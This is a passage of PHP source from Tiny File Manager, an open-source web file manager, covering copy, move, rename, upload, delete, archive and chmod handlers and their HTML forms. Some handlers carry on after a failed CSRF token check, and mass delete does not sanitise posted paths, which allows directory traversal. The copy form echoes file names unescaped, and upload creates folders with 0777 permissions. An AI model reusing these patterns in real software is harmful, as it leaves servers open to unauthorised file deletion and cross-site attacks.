fm_set_msg(lng('Invalid characters in file or folder name'), 'error'); } $FM_PATH = FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Copy folder / file if (isset($_GET['copy'], $_GET['finish']) && !FM_READONLY) { // from $copy = urldecode($_GET['copy']); $copy = fm_clean_path($copy); // empty path if ($copy == '') { fm_set_msg(lng('Source path not defined'), 'error'); $FM_PATH = FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // abs path from $from = FM_ROOT_PATH . '/' . $copy; // abs path to $dest = FM_ROOT_PATH; if (FM_PATH != '') { $dest .= '/' . FM_PATH; } $dest .= '/' . basename($from); // move? $move = isset($_GET['move']); $move = fm_clean_path(urldecode($move)); // copy/move/duplicate if ($from != $dest) { $msg_from = trim(FM_PATH . '/' . basename($from), '/'); if ($move) { // Move and to != from so just perform move $rename = fm_rename($from, $dest); if ($rename) { fm_set_msg(sprintf(lng('Moved from') . ' <b>%s</b> ' . lng('to') . ' <b>%s</b>', fm_enc($copy), fm_enc($msg_from))); } elseif ($rename === null) { fm_set_msg(lng('File or folder with this path already exists'), 'alert'); } else { fm_set_msg(sprintf(lng('Error while moving from') . ' <b>%s</b> ' . lng('to') . ' <b>%s</b>', fm_enc($copy), fm_enc($msg_from)), 'error'); } } else { // Not move and to != from so copy with original name if (fm_rcopy($from, $dest)) { fm_set_msg(sprintf(lng('Copied from') . ' <b>%s</b> ' . lng('to') . ' <b>%s</b>', fm_enc($copy), fm_enc($msg_from))); } else { fm_set_msg(sprintf(lng('Error while copying from') . ' <b>%s</b> ' . lng('to') . ' <b>%s</b>', fm_enc($copy), fm_enc($msg_from)), 'error'); } } } else { if (!$move) { //Not move and to = from so duplicate $msg_from = trim(FM_PATH . '/' . basename($from), '/'); $fn_parts = pathinfo($from); $extension_suffix = ''; if (!is_dir($from)) { $extension_suffix = '.' . $fn_parts['extension']; } //Create new name for duplicate $fn_duplicate = $fn_parts['dirname'] . '/' . $fn_parts['filename'] . '-' . date('YmdHis') . $extension_suffix; $loop_count = 0; $max_loop = 1000; // Check if a file with the duplicate name already exists, if so, make new name (edge case...) while (file_exists($fn_duplicate) & $loop_count < $max_loop) { $fn_parts = pathinfo($fn_duplicate); $fn_duplicate = $fn_parts['dirname'] . '/' . $fn_parts['filename'] . '-copy' . $extension_suffix; $loop_count++; } if (fm_rcopy($from, $fn_duplicate, False)) { fm_set_msg(sprintf('Copied from <b>%s</b> to <b>%s</b>', fm_enc($copy), fm_enc($fn_duplicate))); } else { fm_set_msg(sprintf('Error while copying from <b>%s</b> to <b>%s</b>', fm_enc($copy), fm_enc($fn_duplicate)), 'error'); } } else { fm_set_msg(lng('Paths must be not equal'), 'alert'); } } $FM_PATH = FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Mass copy files/ folders if (isset($_POST['file'], $_POST['copy_to'], $_POST['finish'], $_POST['token']) && !FM_READONLY) { if (!verifyToken($_POST['token'])) { fm_set_msg(lng('Invalid Token.'), 'error'); } // from $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } // to $copy_to_path = FM_ROOT_PATH; $copy_to = fm_clean_path($_POST['copy_to']); if ($copy_to != '') { $copy_to_path .= '/' . $copy_to; } if ($path == $copy_to_path) { fm_set_msg(lng('Paths must be not equal'), 'alert'); $FM_PATH = FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } if (!is_dir($copy_to_path)) { if (!fm_mkdir($copy_to_path, true)) { fm_set_msg('Unable to create destination folder', 'error'); $FM_PATH = FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } } // move? $move = isset($_POST['move']); // copy/move $errors = 0; $files = $_POST['file']; if (is_array($files) && count($files)) { foreach ($files as $f) { if ($f != '') { $f = fm_clean_path($f); // abs path from $from = $path . '/' . $f; // abs path to $dest = $copy_to_path . '/' . $f; // do if ($move) { $rename = fm_rename($from, $dest); if ($rename === false) { $errors++; } } else { if (!fm_rcopy($from, $dest)) { $errors++; } } } } if ($errors == 0) { $msg = $move ? 'Selected files and folders moved' : 'Selected files and folders copied'; fm_set_msg($msg); } else { $msg = $move ? 'Error while moving items' : 'Error while copying items'; fm_set_msg($msg, 'error'); } } else { fm_set_msg(lng('Nothing selected'), 'alert'); } $FM_PATH = FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Rename if (isset($_POST['rename_from'], $_POST['rename_to'], $_POST['token']) && !FM_READONLY) { if (!verifyToken($_POST['token'])) { fm_set_msg("Invalid Token.", 'error'); } // old name $old = urldecode($_POST['rename_from']); $old = fm_clean_path($old); $old = str_replace('/', '', $old); // new name $new = urldecode($_POST['rename_to']); $new = fm_clean_path(strip_tags($new)); $new = str_replace('/', '', $new); // path $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } // rename if (fm_isvalid_filename($new) && $old != '' && $new != '') { if (fm_rename($path . '/' . $old, $path . '/' . $new)) { fm_set_msg(sprintf(lng('Renamed from') . ' <b>%s</b> ' . lng('to') . ' <b>%s</b>', fm_enc($old), fm_enc($new))); } else { fm_set_msg(sprintf(lng('Error while renaming from') . ' <b>%s</b> ' . lng('to') . ' <b>%s</b>', fm_enc($old), fm_enc($new)), 'error'); } } else { fm_set_msg(lng('Invalid characters in file name'), 'error'); } $FM_PATH = FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Download if (isset($_GET['dl'], $_POST['token'])) { // Verify the token to ensure it's valid if (!verifyToken($_POST['token'])) { fm_set_msg("Invalid Token.", 'error'); exit; } // Clean the download file path $dl = urldecode($_GET['dl']); $dl = fm_clean_path($dl); $dl = str_replace('/', '', $dl); // Prevent directory traversal attacks // Define the file path $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } // Check if the file exists and is valid if ($dl != '' && is_file($path . '/' . $dl)) { // Close the session to prevent session locking if (session_status() === PHP_SESSION_ACTIVE) { session_write_close(); } // Call the download function fm_download_file($path . '/' . $dl, $dl, 1024); // Download with a buffer size of 1024 bytes exit; } else { // Handle the case where the file is not found fm_set_msg(lng('File not found'), 'error'); $FM_PATH = FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } } // Upload if (!empty($_FILES) && !FM_READONLY) { if (isset($_POST['token'])) { if (!verifyToken($_POST['token'])) { $response = array('status' => 'error', 'info' => "Invalid Token."); echo json_encode($response); exit(); } } else { $response = array('status' => 'error', 'info' => "Token Missing."); echo json_encode($response); exit(); } $chunkIndex = $_POST['dzchunkindex']; $chunkTotal = $_POST['dztotalchunkcount']; $fullPathInput = fm_clean_path($_REQUEST['fullpath']); $f = $_FILES; $path = FM_ROOT_PATH; $ds = DIRECTORY_SEPARATOR; if (FM_PATH != '') { $path .= '/' . FM_PATH; } $errors = 0; $uploads = 0; $allowed = (FM_UPLOAD_EXTENSION) ? explode(',', FM_UPLOAD_EXTENSION) : false; $response = array( 'status' => 'error', 'info' => 'Oops! Try again' ); $filename = $f['file']['name']; $tmp_name = $f['file']['tmp_name']; $ext = pathinfo($filename, PATHINFO_FILENAME) != '' ? strtolower(pathinfo($filename, PATHINFO_EXTENSION)) : ''; $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true; if (!fm_isvalid_filename($filename) && !fm_isvalid_filename($fullPathInput)) { $response = array( 'status' => 'error', 'info' => "Invalid File name!", ); echo json_encode($response); exit(); } $targetPath = $path . $ds; if (is_writable($targetPath)) { $fullPath = $path . '/' . $fullPathInput; $folder = substr($fullPath, 0, strrpos($fullPath, "/")); if (!is_dir($folder)) { $old = umask(0); mkdir($folder, 0777, true); umask($old); } if (empty($f['file']['error']) && !empty($tmp_name) && $tmp_name != 'none' && $isFileAllowed) { if ($chunkTotal) { $out = @fopen("{$fullPath}.part", $chunkIndex == 0 ? "wb" : "ab"); if ($out) { $in = @fopen($tmp_name, "rb"); if ($in) { if (PHP_VERSION_ID < 80009) { // workaround https://bugs.php.net/bug.php?id=81145 do { for (;;) { $buff = fread($in, 4096); if ($buff === false || $buff === '') { break; } fwrite($out, $buff); } } while (!feof($in)); } else { stream_copy_to_stream($in, $out); } $response = array( 'status' => 'success', 'info' => "file upload successful" ); } else { $response = array( 'status' => 'error', 'info' => "failed to open output stream", 'errorDetails' => error_get_last() ); } @fclose($in); @fclose($out); @unlink($tmp_name); $response = array( 'status' => 'success', 'info' => "file upload successful" ); } else { $response = array( 'status' => 'error', 'info' => "failed to open output stream" ); } if ($chunkIndex == $chunkTotal - 1) { if (file_exists($fullPath)) { $ext_1 = $ext ? '.' . $ext : ''; $fullPathTarget = $path . '/' . basename($fullPathInput, $ext_1) . '_' . date('ymdHis') . $ext_1; } else { $fullPathTarget = $fullPath; } rename("{$fullPath}.part", $fullPathTarget); } } else if (move_uploaded_file($tmp_name, $fullPath)) { // Be sure that the file has been uploaded if (file_exists($fullPath)) { $response = array( 'status' => 'success', 'info' => "file upload successful" ); } else { $response = array( 'status' => 'error', 'info' => 'Couldn\'t upload the requested file.' ); } } else { $response = array( 'status' => 'error', 'info' => "Error while uploading files. Uploaded files $uploads", ); } } } else { $response = array( 'status' => 'error', 'info' => 'The specified folder for upload isn\'t writeable.' ); } // Return the response echo json_encode($response); exit(); } // Mass deleting if (isset($_POST['group'], $_POST['delete'], $_POST['token']) && !FM_READONLY) { if (!verifyToken($_POST['token'])) { fm_set_msg(lng("Invalid Token."), 'error'); } $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } $errors = 0; $files = $_POST['file']; if (is_array($files) && count($files)) { foreach ($files as $f) { if ($f != '') { $new_path = $path . '/' . $f; if (!fm_rdelete($new_path)) { $errors++; } } } if ($errors == 0) { fm_set_msg(lng('Selected files and folder deleted')); } else { fm_set_msg(lng('Error while deleting items'), 'error'); } } else { fm_set_msg(lng('Nothing selected'), 'alert'); } $FM_PATH = FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Pack files zip, tar if (isset($_POST['group'], $_POST['token']) && (isset($_POST['zip']) || isset($_POST['tar'])) && !FM_READONLY) { if (!verifyToken($_POST['token'])) { fm_set_msg(lng("Invalid Token."), 'error'); } $path = FM_ROOT_PATH; $ext = 'zip'; if (FM_PATH != '') { $path .= '/' . FM_PATH; } //set pack type $ext = isset($_POST['tar']) ? 'tar' : 'zip'; if (($ext == "zip" && !class_exists('ZipArchive')) || ($ext == "tar" && !class_exists('PharData'))) { fm_set_msg(lng('Operations with archives are not available'), 'error'); $FM_PATH = FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } $files = $_POST['file']; $sanitized_files = array(); // clean path foreach ($files as $file) { array_push($sanitized_files, fm_clean_path($file)); } $files = $sanitized_files; if (!empty($files)) { chdir($path); if (count($files) == 1) { $one_file = reset($files); $one_file = basename($one_file); $zipname = $one_file . '_' . date('ymd_His') . '.' . $ext; } else { $zipname = 'archive_' . date('ymd_His') . '.' . $ext; } if ($ext == 'zip') { $zipper = new FM_Zipper(); $res = $zipper->create($zipname, $files); } elseif ($ext == 'tar') { $tar = new FM_Zipper_Tar(); $res = $tar->create($zipname, $files); } if ($res) { fm_set_msg(sprintf(lng('Archive') . ' <b>%s</b> ' . lng('Created'), fm_enc($zipname))); } else { fm_set_msg(lng('Archive not created'), 'error'); } } else { fm_set_msg(lng('Nothing selected'), 'alert'); } $FM_PATH = FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Unpack zip, tar if (isset($_POST['unzip'], $_POST['token']) && !FM_READONLY) { if (!verifyToken($_POST['token'])) { fm_set_msg(lng("Invalid Token."), 'error'); } $unzip = urldecode($_POST['unzip']); $unzip = fm_clean_path($unzip); $unzip = str_replace('/', '', $unzip); $isValid = false; $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } if ($unzip != '' && is_file($path . '/' . $unzip)) { $zip_path = $path . '/' . $unzip; $ext = pathinfo($zip_path, PATHINFO_EXTENSION); $isValid = true; } else { fm_set_msg(lng('File not found'), 'error'); } if (($ext == "zip" && !class_exists('ZipArchive')) || ($ext == "tar" && !class_exists('PharData'))) { fm_set_msg(lng('Operations with archives are not available'), 'error'); $FM_PATH = FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } if ($isValid) { //to folder $tofolder = ''; if (isset($_POST['tofolder'])) { $tofolder = pathinfo($zip_path, PATHINFO_FILENAME); if (fm_mkdir($path . '/' . $tofolder, true)) { $path .= '/' . $tofolder; } } if ($ext == "zip") { $zipper = new FM_Zipper(); $res = $zipper->unzip($zip_path, $path); } elseif ($ext == "tar") { try { $gzipper = new PharData($zip_path); if (@$gzipper->extractTo($path, null, true)) { $res = true; } else { $res = false; } } catch (Exception $e) { //TODO:: need to handle the error $res = true; } } if ($res) { fm_set_msg(lng('Archive unpacked')); } else { fm_set_msg(lng('Archive not unpacked'), 'error'); } } else { fm_set_msg(lng('File not found'), 'error'); } $FM_PATH = FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Change Perms (not for Windows) if (isset($_POST['chmod'], $_POST['token']) && !FM_READONLY && !FM_IS_WIN) { if (!verifyToken($_POST['token'])) { fm_set_msg(lng("Invalid Token."), 'error'); } $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } $file = $_POST['chmod']; $file = fm_clean_path($file); $file = str_replace('/', '', $file); if ($file == '' || (!is_file($path . '/' . $file) && !is_dir($path . '/' . $file))) { fm_set_msg(lng('File not found'), 'error'); $FM_PATH = FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } $mode = 0; if (!empty($_POST['ur'])) { $mode |= 0400; } if (!empty($_POST['uw'])) { $mode |= 0200; } if (!empty($_POST['ux'])) { $mode |= 0100; } if (!empty($_POST['gr'])) { $mode |= 0040; } if (!empty($_POST['gw'])) { $mode |= 0020; } if (!empty($_POST['gx'])) { $mode |= 0010; } if (!empty($_POST['or'])) { $mode |= 0004; } if (!empty($_POST['ow'])) { $mode |= 0002; } if (!empty($_POST['ox'])) { $mode |= 0001; } if (@chmod($path . '/' . $file, $mode)) { fm_set_msg(lng('Permissions changed')); } else { fm_set_msg(lng('Permissions not changed'), 'error'); } $FM_PATH = FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } / ACTIONS / // get current path $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } // check path if (!is_dir($path)) { fm_redirect(FM_SELF_URL . '?p='); } // get parent folder $parent = fm_get_parent_path(FM_PATH); $objects = is_readable($path) ? scandir($path) : array(); $folders = array(); $files = array(); $current_path = array_slice(explode("/", $path), -1)[0]; if (is_array($objects) && fm_is_exclude_items($current_path, $path)) { foreach ($objects as $file) { if ($file == '.' || $file == '..') { continue; } if (!FM_SHOW_HIDDEN && substr($file, 0, 1) === '.') { continue; } $new_path = $path . '/' . $file; if (@is_file($new_path) && fm_is_exclude_items($file, $new_path)) { $files[] = $file; } elseif (@is_dir($new_path) && $file != '.' && $file != '..' && fm_is_exclude_items($file, $new_path)) { $folders[] = $file; } } } if (!empty($files)) { natcasesort($files); } if (!empty($folders)) { natcasesort($folders); } // upload form if (isset($_GET['upload']) && !FM_READONLY) { fm_show_header(); // HEADER fm_show_nav_path(FM_PATH); // current path //get the allowed file extensions function getUploadExt() { $extArr = explode(',', FM_UPLOAD_EXTENSION); if (FM_UPLOAD_EXTENSION && $extArr) { array_walk($extArr, function (&$x) { $x = ".$x"; }); return implode(',', $extArr); } return ''; } ?> <?php print_external('css-dropzone'); ?> <div class="path"> <div class="card mb-2 fm-upload-wrapper" data-bs-theme="<?php echo FM_THEME; ?>"> <div class="card-header"> <ul class="nav nav-tabs card-header-tabs"> <li class="nav-item"> <a class="nav-link active" href="#fileUploader" data-target="#fileUploader"><i class="fa fa-arrow-circle-o-up"></i> <?php echo lng('UploadingFiles') ?></a> </li> <li class="nav-item"> <a class="nav-link" href="#urlUploader" class="js-url-upload" data-target="#urlUploader"><i class="fa fa-link"></i> <?php echo lng('Upload from URL') ?></a> </li> </ul> </div> <div class="card-body"> <p class="card-text"> <a href="?p=<?php echo FM_PATH ?>" class="float-right"><i class="fa fa-chevron-circle-left go-back"></i> <?php echo lng('Back') ?></a> <strong><?php echo lng('DestinationFolder') ?></strong>: <?php echo fm_enc(fm_convert_win(FM_PATH)) ?> </p> <form action="<?php echo htmlspecialchars(FM_SELF_URL) . '?p=' . fm_enc(FM_PATH) ?>" class="dropzone card-tabs-container" id="fileUploader" enctype="multipart/form-data"> <input type="hidden" name="p" value="<?php echo fm_enc(FM_PATH) ?>"> <input type="hidden" name="fullpath" id="fullpath" value="<?php echo fm_enc(FM_PATH) ?>"> <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>"> <div class="fallback"> <input name="file" type="file" multiple /> </div> </form> <div class="upload-url-wrapper card-tabs-container hidden" id="urlUploader"> <form id="js-form-url-upload" class="row row-cols-lg-auto g-3 align-items-center" onsubmit="return upload_from_url(this);" method="POST" action=""> <input type="hidden" name="type" value="upload" aria-label="hidden" aria-hidden="true"> <input type="url" placeholder="URL" name="uploadurl" required class="form-control" style="width: 80%"> <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>"> <button type="submit" class="btn btn-primary ms-3"><?php echo lng('Upload') ?></button> <div class="lds-facebook"> <div></div> <div></div> <div></div> </div> </form> <div id="js-url-upload__list" class="col-9 mt-3"></div> </div> </div> </div> </div> <?php print_external('js-dropzone'); ?> <script> Dropzone.options.fileUploader = { chunking: true, chunkSize: <?php echo UPLOAD_CHUNK_SIZE; ?>, forceChunking: true, retryChunks: true, retryChunksLimit: 3, parallelUploads: 1, parallelChunkUploads: false, timeout: 120000, maxFilesize: "<?php echo MAX_UPLOAD_SIZE; ?>", acceptedFiles: "<?php echo getUploadExt() ?>", init: function() { this.on("sending", function(file, xhr, formData) { let _path = (file.fullPath) ? file.fullPath : file.name; document.getElementById("fullpath").value = _path; xhr.ontimeout = (function() { toast('Error: Server Timeout'); }); }).on("success", function(res) { try { let _response = JSON.parse(res.xhr.response); if (_response.status == "error") { toast(_response.info); } } catch (e) { toast("Error: Invalid JSON response"); } }).on("error", function(file, response) { toast(response); }); } } </script> <?php fm_show_footer(); exit; } // copy form POST if (isset($_POST['copy']) && !FM_READONLY) { $copy_files = isset($_POST['file']) ? $_POST['file'] : null; if (!is_array($copy_files) || empty($copy_files)) { fm_set_msg(lng('Nothing selected'), 'alert'); $FM_PATH = FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } fm_show_header(); // HEADER fm_show_nav_path(FM_PATH); // current path ?> <div class="path"> <div class="card" data-bs-theme="<?php echo FM_THEME; ?>"> <div class="card-header"> <h6><?php echo lng('Copying') ?></h6> </div> <div class="card-body"> <form action="" method="post"> <input type="hidden" name="p" value="<?php echo fm_enc(FM_PATH) ?>"> <input type="hidden" name="finish" value="1"> <?php foreach ($copy_files as $cf) { echo '<input type="hidden" name="file[]" value="' . fm_enc($cf) . '">' . PHP_EOL; } ?> <p class="break-word"><strong><?php echo lng('Files') ?></strong>: <b><?php echo implode('</b>, <b>', $copy_files) ?></b></p> <p class="break-word"><strong><?php echo lng('SourceFolder') ?></strong>: <?php echo fm_enc(fm_convert_win(FM_ROOT_PATH . '/' . FM_PATH)) ?><br> <label for="inp_copy_to"><strong><?php echo lng('DestinationFolder') ?></strong>:</label> <?php echo FM_ROOT_PATH ?>/<input type="text" name="copy_to" id="inp_copy_to" value="<?php echo fm_enc(FM_PATH) ?>"> </p> <p class="custom-checkbox custom-control"><input type="checkbox" name="move" value="1" id="js-move-files" class="custom-control-input"> <label for="js-move-files" class="custom-control-label ms-2"><?php echo lng('Move') ?></label> </p> <p> <b><a href="?p=<?php echo urlencode(FM_PATH) ?>" class="btn btn-outline-danger"><i class="fa fa-times-circle"></i> <?php echo lng('Cancel') ?></a></b> <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>"> <button type="submit" class="btn btn-success"><i class="fa fa-check-circle"></i> <?php echo lng('Copy') ?></button> </p> </form> </div> </div> </div> <?php fm_show_footer(); exit; } // copy form if (isset($_GET['copy']) && !isset($_GET['finish']) && !FM_READONLY) { $copy = $_GET['copy']; $copy = fm_clean_path($copy); if ($copy == '' || !file_exists(FM_ROOT_PATH . '/' . $copy)) { fm_set_msg(lng('File not found'), 'error'); $FM_PATH = FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } fm_show_header(); // HEADER fm_show_nav_path(FM_PATH); // current path ?> <div class="path"> <p><b>Copying</b></p> <p class="break-word"> <strong>Source path:</strong> <?php echo fm_enc(fm_convert_win(FM_ROOT_PATH . '/' . $copy)) ?><br> <strong>Destination folder:</strong> <?php echo fm_enc(fm_convert_win(FM_ROOT_PATH . '/' . FM_PATH)) ?> </p> <p> <b><a href="?p=<?php echo urlencode(FM_PATH) ?>&copy=<?php echo urlencode($copy) ?>&finish=1"><i class="fa fa-check-circle"></i> Copy</a></b> <b><a href="?p=<?php echo urlencode(FM_PATH) ?>&copy=<?php echo urlencode($copy) ?>&finish=1&move=1"><i class="fa fa-check-circle"></i> Move</a></b> <b><a href="?p=<?php echo urlencode(FM_PATH) ?>" class="text-danger"><i class="fa fa-times-circle"></i> Cancel</a></b> </p> <p><i><?php echo lng('Select folder') ?></i></p> <ul class="folders break-word"> <?php if ($parent !== false) { ?> <li><a href="?p=<?php echo urlencode($parent) ?>&copy=<?php echo urlencode($copy) ?>"><i class="fa fa-chevron-circle-left"></i> ..</a></li> <?php } foreach ($folders as $f) { ?> <li> <a href="?p=<?php echo urlencode(trim(FM_PATH . '/' . $f, '/')) ?>&copy=<?php echo urlencode($copy) ?>"><i class="fa fa-folder-o"></i> <?php echo fm_convert_win($f) ?></a> </li> <?php } ?> </ul> </div> <?php fm_show_footer(); exit; } if (isset($_GET['settings']) && !FM_READONLY) { fm_show_header(); // HEADER fm_show_nav_path(FM_PATH); // current path global $cfg, $lang, $lang_list; ?> <div class="col-md-8 offset-md-2 pt-3"> <div class="card mb-2" data-bs-theme="<?php echo FM_THEME; ?>"> <h6 class="card-header d-flex justify-content-between"> <span><i class="fa fa-cog"></i> <?php echo lng('Settings') ?></span> <a href="?p=<?php echo FM_PATH ?>" class="text-danger"><i class="fa fa-times-circle-o"></i> <?php echo lng('Cancel') ?></a> </h6> <div class="card-body"> <form id="js-settings-form" action="" method="post" data-type="ajax" onsubmit="return save_settings(this)"> <input type="hidden" name="type" value="settings" aria-label="hidden" aria-hidden="true"> <div class="form-group row"> <label for="js-language" class="col-sm-3 col-form-label"><?php echo lng('Language') ?></label> <div class="col-sm-5"> <select class="form-select" id="js-language" name="js-language"> <?php function getSelected($l) { global $lang; return ($lang == $l) ? 'selected' : ''; } foreach ($lang_list as $k => $v) { echo "<option value='$k' " . getSelected($k) . ">$v</option>"; } ?> </select> </div> </div> <div class="mt-3 mb-3 row "> <label for="js-error-report" class="col-sm-3 col-form-label"><?php echo lng('ErrorReporting') ?></label> <div class="col-sm-9"> <div class="form-check form-switch"> <input class="form-check-input" type="checkbox" role="switch" id="js-error-report" name="js-error-report" value="true" <?php echo $report_errors ? 'checked' : ''; ?> /> </div> </div> </div> <div class="mb-3 row"> <label for="js-show-hidden" class="col-sm-3 col-form-label"><?php echo lng('ShowHiddenFiles') ?></label> <div class="col-sm-9"> <div class="form-check form-switch"> <input class="form-check-input" type="checkbox" role="switch" id="js-show-hidden" name="js-show-hidden" value="true" <?php echo $show_hidden_files ? 'checked' : ''; ?> /> </div> </div> </div> <div class="mb-3 row"> <label for="js-hide-cols" class="col-sm-3 col-form-label"><?php echo lng('HideColumns') ?></label> <div class="col-sm-9"> <div class="form-check form-switch"> <input class="form-check-input" type="checkbox" role="switch" id="js-hide-cols" name="js-hide-cols" value="true" <?php echo $hide_Cols ? 'checked' : ''; ?> /> </div> </div> </div> <div class="mb-3 row"> <label for="js-3-1" class="col-sm-3 col-form-label"><?php echo lng('Theme') ?></label> <div class="col-sm-5"> <select class="form-select w-100 text-capitalize" id="js-3-0" name="js-theme-3"> <option value='light' <?php if ($theme == "light") { echo "selected"; } ?>> <?php echo lng('light') ?> </option> <option value='dark' <?php if ($theme == "dark") { echo "selected"; } ?>> <?php echo lng('dark') ?> </option> </select> </div> </div> <div class="mb-3 row"> <div class="col-sm-10"> <button type="submit" class="btn btn-success"> <i class="fa fa-check-circle"></i> <?php echo lng('Save'); ?></button> </div> </div> <small class="text-body-secondary"> <?php echo lng('Sometimes the save action may not work on the first try, so please attempt it again') ?>.</span> </form> </div> </div> </div> <?php fm_show_footer(); exit; } if (isset($_GET['help'])) { fm_show_header(); // HEADER fm_show_nav_path(FM_PATH); // current path global $cfg, $lang; ?> <div class="col-md-8 offset-md-2 pt-3"> <div class="card mb-2" data-bs-theme="<?php echo FM_THEME; ?>"> <h6 class="card-header d-flex justify-content-between"> <span><i class="fa fa-exclamation-circle"></i> <?php echo lng('Help') ?></span> <a href="?p=<?php echo FM_PATH ?>" class="text-danger"><i class="fa fa-times-circle-o"></i> <?php echo lng('Cancel') ?></a> </h6> <div class="card-body"> <div class="row"> <div class="col-xs-12 col-sm-6"> <p> <h3><a href="https://github.com/prasathmani/tinyfilemanager" target="_blank" class="app-v-title"> Tiny File Manager <?php echo VERSION; ?></a></h3> </p> <p>Author: PRAŚATH MANİ</p> <p>Mail Us: <a href="mailto:ccpprogrammers@gmail.com">ccpprogrammers [at] gmail [dot] com</a> </p> </div> <div class="col-xs-12 col-sm-6"> <div class="card"> <ul class="list-group list-group-flush"> <li class="list-group-item"><a href="https://github.com/prasathmani/tinyfilemanager/wiki" target="_blank"><i class="fa fa-question-circle"></i> <?php echo lng('Help Documents') ?> </a> </li> <li class="list-group-item"><a href="https://github.com/prasathmani/tinyfilemanager/issues" target="_blank"><i class="fa fa-bug"></i> <?php echo lng('Report Issue') ?></a></li> <?php if (!FM_READONLY) { ?> <li class="list-group-item"><a href="javascript:show_new_pwd();"><i class="fa fa-lock"></i> <?php echo lng('Generate new password hash') ?></a></li> <?php } ?> </ul> </div> </div> </div> <div class="row js-new-pwd hidden mt-2"> <div class="col-12"> <form class="form-inline" onsubmit="return new_password_hash(this)" method="POST" action=""> <input type="hidden" name="type" value="pwdhash" aria-label="hidden" aria-hidden="true"> <div class="form-group mb-2"> <label for="staticEmail2"><?php echo lng('Generate new password hash') ?></label> </div> <div class="form-group mx-sm-3 mb-2"> <label for="inputPassword2" class="sr-only"><?php echo lng('Password') ?></label> <input type="text" class="form-control btn-sm" id="inputPassword2" name="inputPassword2" placeholder="<?php echo lng('Password') ?>" required> </div> <button type="submit" class="btn btn-success btn-sm mb-2"><?php echo lng('Generate') ?></button> </form> <textarea class="form-control" rows="2" readonly id="js-pwd-result"></textarea> </div> </div> </div> </div> </div> <?php fm_show_footer(); exit; } // file viewer if (isset($_GET['view'])) { $file = $_GET['view']; $file = fm_clean_path($file, false); $file = str_replace('/', '', $file); if ($file == '' || !is_file($path . '/' . $file) || !fm_is_exclude_items($file, $path . '/' . $file)) { fm_set_msg(lng('File not found'), 'error'); $FM_PATH = FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } fm_show_header(); // HEADER fm_show_nav_path(FM_PATH); // current path $file_url = FM_ROOT_URL . fm_convert_win((FM_PATH != '' ? '/' . FM_PATH : '') . '/' . $file); $file_path = $path . '/' . $file; $ext = strtolower(pathinfo($file_path, PATHINFO_EXTENSION)); $mime_type = fm_get_mime_type($file_path); $filesize_raw = fm_get_size($file_path); $filesize = fm_get_filesize($filesize_raw); $is_zip = false; $is_gzip = false; $is_image = false; $is_audio = false; $is_video = false; $is_text = false; $is_onlineViewer = false; $view_title = 'File'; $filenames = false; // for zip $content = ''; // for text $online_viewer = strtolower(FM_DOC_VIEWER); if ($online_viewer && $online_viewer !== 'false' && in_array($ext, fm_get_onlineViewer_exts())) { $is_onlineViewer = true; } elseif ($ext == 'zip' || $ext == 'tar') { $is_zip = true; $view_title = 'Archive'; $filenames = fm_get_zif_info($file_path, $ext); } elseif (in_array($ext, fm_get_image_exts())) { $is_image = true; $view_title = 'Image'; } elseif (in_array($ext, fm_get_audio_exts())) { $is_audio = true; $view_title = 'Audio'; } elseif (in_array($ext, fm_get_video_exts())) { $is_video = true; $view_title = 'Video'; } elseif (in_array($ext, fm_get_text_exts()) || substr($mime_type, 0, 4) == 'text' || in_array($mime_type, fm_get_text_mimes())) { $is_text = true; $content = file_get_contents($file_path); } ?> <div class="row"> <div class="col-12"> <ul class="list-group w-50 my-3" data-bs-theme="<?php echo FM_THEME; ?>"> <li class="list-group-item active" aria-current="true"><strong><?php echo lng($view_title) ?>:</strong> <?php echo fm_enc(fm_convert_win($file)) ?></li> <?php $display_path = fm_get_display_path($file_path); ?> <li class="list-group-item"><strong><?php echo $display_path['label']; ?>:</strong> <?php echo $display_path['path']; ?></li> <li class="list-group-item"><strong><?php echo lng('Date Modified') ?>:</strong> <?php echo date(FM_DATETIME_FORMAT, filemtime($file_path)); ?></li> <li class="list-group-item"><strong><?php echo lng('File size') ?>:</strong> <?php echo ($filesize_raw <= 1000) ? "$filesize_raw bytes" : $filesize; ?></li> <li class="list-group-item"><strong><?php echo lng('MIME-type') ?>:</strong> <?php echo $mime_type ?></li> <?php // ZIP info if (($is_zip || $is_gzip) && $filenames !== false) { $total_files = 0; $total_comp = 0; $total_uncomp = 0; foreach ($filenames as $fn) { if 